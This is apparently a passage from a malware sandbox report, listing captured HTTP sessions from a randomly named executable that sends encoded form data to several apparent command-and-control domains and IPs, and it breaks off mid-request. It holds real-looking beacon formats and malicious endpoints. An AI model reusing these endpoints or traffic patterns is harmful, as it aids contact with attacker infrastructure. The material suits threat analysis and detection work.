                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mizuquan.top
                                                        Origin: http://www.mizuquan.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mizuquan.top/e0nr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 52 51 73 76 71 74 69 79 52 61 54 6f 51 6a 55 33 55 33 36 61 6c 73 4e 2f 4e 2b 7a 62 4a 4d 41 31 72 57 30 4e 48 46 73 65 4c 4d 63 67 65 51 2b 73 31 74 46 6b 30 6c 64 4f 62 34 74 71 70 6e 65 65 74 57 30 51 64 67 52 75 39 6b 49 51 62 38 61 55 56 58 2b 69 41 74 50 45 43 32 65 58 48 73 54 49 2b 44 6d 4e 6c 35 2f 6b 54 35 4b 38 52 54 36 41 62 4c 4a 50 32 72 46 69 38 64 35 46 6e 4d 45 68 72 50 65 76 47 62 69 64 75 41 61 66 6a 74 4c 5a 2b 35 4b 7a 47 34 6b 79 34 71 6c 52 45 30 65 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X= [TRUNCATED]
                                                        Sep 18, 2024 16:20:17.275325060 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:20:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        32 | 192.168.2.5 | 53650 | 43.242.202.169 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:18.911250114 CEST | 561 | OUT | GET /e0nr/?x0wHoJ8X=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txGVJXSKSxkKFGk1ZeWgOOIZqPnSDvoqvGMyEebPgjbI83mQ==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mizuquan.top
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:20:19.922276974 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:20:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        33 | 192.168.2.5 | 53651 | 103.224.182.242 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:26.244155884 CEST | 828 | OUT | POST /pp43/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.nobartv6.website
                                                        Origin: http://www.nobartv6.website
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.nobartv6.website/pp43/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6d 57 79 55 2f 72 32 54 6e 52 34 4f 43 34 6f 44 57 2f 38 6b 68 4b 35 71 71 76 73 35 67 41 52 5a 47 76 47 33 5a 72 2f 38 69 75 52 54 43 69 35 58 4d 33 68 72 50 78 6c 30 72 70 63 57 4e 41 47 6a 49 66 43 74 46 75 33 45 6d 37 65 78 4c 6b 68 70 4b 33 32 51 63 45 43 70 63 44 7a 69 31 6c 2f 6a 68 51 58 6b 38 45 46 6b 5a 51 6c 66 66 46 4c 77 4a 4f 71 4c 49 44 56 2f 56 71 64 77 70 39 53 6f 68 75 65 46 56 7a 42 4f 47 78 6e 79 54 51 7a 30 51 49 52 77 73 7a 43 31 4c 61 5a 48 57 58 54 67 45 44 47 44 71 47 72 49 4d 6f 37 4b 74 4c 6b 7a 78 52 76 73 4e 6c 39 36 57 74 41 3d
                                                        Data Ascii: x0wHoJ8X=ywbiYQ/q4W1CmWyU/r2TnR4OC4oDW/8khK5qqvs5gARZGvG3Zr/8iuRTCi5XM3hrPxl0rpcWNAGjIfCtFu3Em7exLkhpK32QcECpcDzi1l/jhQXk8EFkZQlffFLwJOqLIDV/Vqdwp9SohueFVzBOGxnyTQz0QIRwszC1LaZHWXTgEDGDqGrIMo7KtLkzxRvsNl96WtA=
                                                        Sep 18, 2024 16:20:26.989557028 CEST | 876 | IN | HTTP/1.1 200 OK
                                                        date: Wed, 18 Sep 2024 14:20:26 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1726669226.5409498; expires=Sat, 16-Sep-2034 14:20:26 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 581
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                        Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        34 | 192.168.2.5 | 53652 | 103.224.182.242 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:28.795279980 CEST | 848 | OUT | POST /pp43/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.nobartv6.website
                                                        Origin: http://www.nobartv6.website
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.nobartv6.website/pp43/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 6c 5a 66 4e 65 33 4c 5a 48 38 6c 75 52 54 4a 43 35 53 43 58 67 47 50 32 74 38 72 6f 77 57 4e 41 36 6a 49 65 79 74 46 64 66 4c 33 37 65 7a 43 45 68 6e 46 58 32 51 63 45 43 70 63 43 58 4d 31 6a 58 6a 67 6c 66 6b 2b 6c 46 72 52 77 6c 59 50 31 4c 77 4e 4f 71 50 49 44 56 4a 56 72 42 65 70 34 65 6f 68 73 47 46 57 69 42 4a 64 68 6e 34 64 77 7a 69 5a 35 34 72 72 7a 4f 45 50 71 4d 50 4b 31 72 4f 42 31 72 70 77 6b 6a 67 66 49 58 79 39 59 73 45 67 68 4f 46 58 47 74 4b 49 36 56 59 63 78 48 6b 33 72 73 4d 66 79 4b 79 69 62 6f 46 53 58 42 39
                                                        Data Ascii: x0wHoJ8X=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThylZfNe3LZH8luRTJC5SCXgGP2t8rowWNA6jIeytFdfL37ezCEhnFX2QcECpcCXM1jXjglfk+lFrRwlYP1LwNOqPIDVJVrBep4eohsGFWiBJdhn4dwziZ54rrzOEPqMPK1rOB1rpwkjgfIXy9YsEghOFXGtKI6VYcxHk3rsMfyKyiboFSXB9
                                                        Sep 18, 2024 16:20:29.401736975 CEST | 876 | IN | HTTP/1.1 200 OK
                                                        date: Wed, 18 Sep 2024 14:20:29 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1726669229.4590276; expires=Sat, 16-Sep-2034 14:20:29 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 581
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                        Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        35 | 192.168.2.5 | 53653 | 103.224.182.242 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:31.624845982 CEST | 1865 | OUT | POST /pp43/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.nobartv6.website
                                                        Origin: http://www.nobartv6.website
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.nobartv6.website/pp43/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 64 5a 44 75 57 33 5a 4f 54 38 6b 75 52 54 41 69 35 54 43 58 68 45 50 77 46 34 72 6f 4d 47 4e 47 2b 6a 4a 39 71 74 4f 4d 66 4c 75 72 65 7a 64 55 68 6d 4b 33 33 4b 63 45 53 74 63 44 6e 4d 31 6a 58 6a 67 69 76 6b 33 55 46 72 58 77 6c 66 66 46 4c 38 4a 4f 71 6a 49 44 4e 5a 56 6f 74 67 6f 4d 69 6f 68 4d 57 46 47 41 5a 4a 52 68 6e 2b 61 77 79 68 5a 35 6b 4f 72 7a 54 39 50 70 51 6c 4b 32 37 4f 43 6a 75 4f 74 6d 72 50 41 6f 33 70 36 6f 64 69 2f 6d 36 77 49 51 70 75 43 4b 35 69 63 46 58 79 38 62 41 49 55 42 4c 35 33 39 49 44 56 77 4e 79 73 47 52 72 59 58 41 78 4b 2b 48 43 34 34 4e 34 73 65 43 35 4a 4d 2b 4e 79 6c 4c 4f 4c 53 32 61 45 31 75 58 7a 32 46 70 78 61 56 39 7a 69 75 69 61 52 74 6c 4c 5a 76 62 77 5a 52 59 50 72 55 78 71 62 4f 6c 69 37 56 6a 38 45 56 69 64 65 4e 61 6b 75 73 48 48 50 73 31 52 4d 38 41 32 55 6a 50 36 2b 6d 55 78 51 78 2b 73 37 4d 42 54 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X= [TRUNCATED]
                                                        Sep 18, 2024 16:20:32.376797915 CEST | 876 | IN | HTTP/1.1 200 OK
                                                        date: Wed, 18 Sep 2024 14:20:32 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1726669232.6762876; expires=Sat, 16-Sep-2034 14:20:32 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 581
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                        Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        36 | 192.168.2.5 | 53654 | 103.224.182.242 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:34.163423061 CEST | 565 | OUT | GET /pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVibvWBC9TblfPfUaDIhDj5FTVmS3R8lZAXA12CkSIDeX1TA==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.nobartv6.website
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:20:34.793801069 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                        date: Wed, 18 Sep 2024 14:20:34 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1726669234.8772544; expires=Sat, 16-Sep-2034 14:20:34 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-length: 1544
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 2f 70 70 34 33 2f 3f 78 30 77 48 6f 4a 38 58 3d 2f 79 7a 43 62 6c 72 4a 73 45 52 75 71 67 7a 7a 76 70 62 46 68 45 5a 58 50 72 45 64 52 4f 67 75 2b 36 5a 68 38 2f 38 59 71 42 30 31 46 75 4f 2b 44 4c 58 66 67 63 6c 76 48 6e 74 33 43 57 4e 75 47 6c 6c 58 74 70 30 38 47 6e 4c 51 4b 4a 32 69 43 74 6a 56 69 62 76 57 42 43 39 54 62 6c 66 50 66 55 61 44 49 68 44 6a 35 46 54 56 6d 53 33 52 38 6c 5a 41 58 41 31 32 43 [TRUNCATED]
                                                        Data Ascii: <html><head><title>nobartv6.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.nobartv6.website/pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVibvWBC9TblfPfUaDIhDj5FTVmS3R8lZAXA12CkSIDeX1TA==&2VDlJ=Z2VdhTx&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><
                                                        Sep 18, 2024 16:20:34.796257019 CEST | 580 | IN | Data Raw: 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f
                                                        Data Ascii: body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.nobartv6.website/pp43/?x0wHoJ8X=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVibvWBC9TblfPfUaDIhDj5FTVmS3R8lZAXA12CkSI


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        37 | 192.168.2.5 | 53655 | 85.159.66.93 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:39.942718983 CEST | 816 | OUT | POST /lrst/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.sailnway.net
                                                        Origin: http://www.sailnway.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
